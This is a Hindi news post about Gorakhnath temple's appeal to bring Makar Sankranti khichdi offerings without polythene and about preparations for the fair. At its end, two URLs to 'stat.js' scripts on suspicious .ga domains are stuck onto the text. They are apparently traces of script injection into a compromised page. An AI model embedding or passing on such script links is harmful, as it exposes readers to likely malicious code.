Tuesday, January 25

15 जनवरी को गोरखनाथ मंदिर खिचड़ी मेला में नहीं लाये ये सामान लग गया प्रतिबन्ध, अपील जारी जरूर पढ़े

इस बार मकर संक्रांति के अवसर पर खिचड़ी चढ़ाने गुरु गोरखनाथ मंदिर आएं तो उसे पॉलीथिन में नहीं बल्कि थैले में लेकर आएं। पर्यावरण संरक्षण के लिए पॉलीथिन पर प्रतिबंध लगाना हर नागरिक की जिम्मेदारी है। यह अपील है गोरखनाथ मंदिर प्रबंधन की हर श्रद्धालु से। मंदिर के प्रधान पुजारी योगी कमलनाथ और मंदिर के सभी कर्मचारी प्रबंधन के इस संदेश को जन-जन तक पहुंचाने में जुटे हुए हैं।


दरअसल मकर संक्रांति के अवसर पर खिचड़ी चढ़ाने के ज्यादातर श्रद्धालु पॉलीथिन में अपनी खिचड़ी लेकर आते हैं। उधर सरकार ने पॉलीथिन के इस्तेमाल पर प्रतिबंध लगा रखा है। सरकार के प्रतिबंध और श्रद्धालुओं की भावना का संतुलन बनाने के क्रम में ही मंदिर प्रबंधन खिचड़ी चढ़ाने के लिए पॉलीथिन का इस्तेमाल न करने की अपील कर रहा है।

गोरखनाथ मंदिर में मकर संक्रांति का पर्व 15 जनवरी को मनाया जाएगा। मंदिर में पर्व की तैयारियों को अंतिम रूप दिया जा रहा है। श्रद्धालु खिचड़ी चढ़ाने के लिए क्रमबद्ध रूप से आसानी से पहुंच सकें, इसके लिए बेरीकेडिंग का कार्य लगभग पूरा हो चुका है। पुरुषों और महिलाओं के लिए अलग-अलग व्यवस्था की जा रही है। मंदिर सचिव द्वारिका तिवारी ने कहा कि मुख्यमंत्री योगी आदित्यनाथ समूचे मंदिर और मेला परिसर में पॉलीथिन के इस्तेमाल पर रोक लगाने की हिदायत दी है। उनके निर्देश के क्रम में ही श्रद्धालुओं को पहले से ही जागरूक किया जा रहा है।

जैसे-जैसे मकर संक्रांति का पर्व नजदीक आ रहा है, गोरखनाथ मंदिर में सजा खिचड़ी मेला की रौनक भी बढ़ती जा रही है। मेला प्रबंधक शिवशंकर उपाध्याय ने बताया कि करीब-करीब सभी दुकानें लग चुकी है। झूले स्थापित हो गए हैं। मौत का कुआं और सर्कस भी जल्द शुरू हो जाएगा। मेले में बड़ी संख्या में लोगों के आने का सिलसिला भी शुरू हो गया है। लोग झूले से लेकर खानपान के स्टॉल तक लुत्फ उठा रहे हैं। रोजमर्रा के सामानों की दुकानों पर काफी भीड़ देखी जा रही है।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

%d bloggers like this: